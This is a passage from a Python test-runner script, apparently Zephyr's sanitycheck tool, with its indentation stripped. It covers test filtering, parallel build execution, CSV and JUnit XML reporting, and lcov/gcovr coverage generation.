if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.name
# remove testcases that are being re-run from exiting reports
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (instance.platform.name, tname):
eleTestsuite.remove(tc)
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, tname),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message=instance.reason)
else:
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Lcov()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
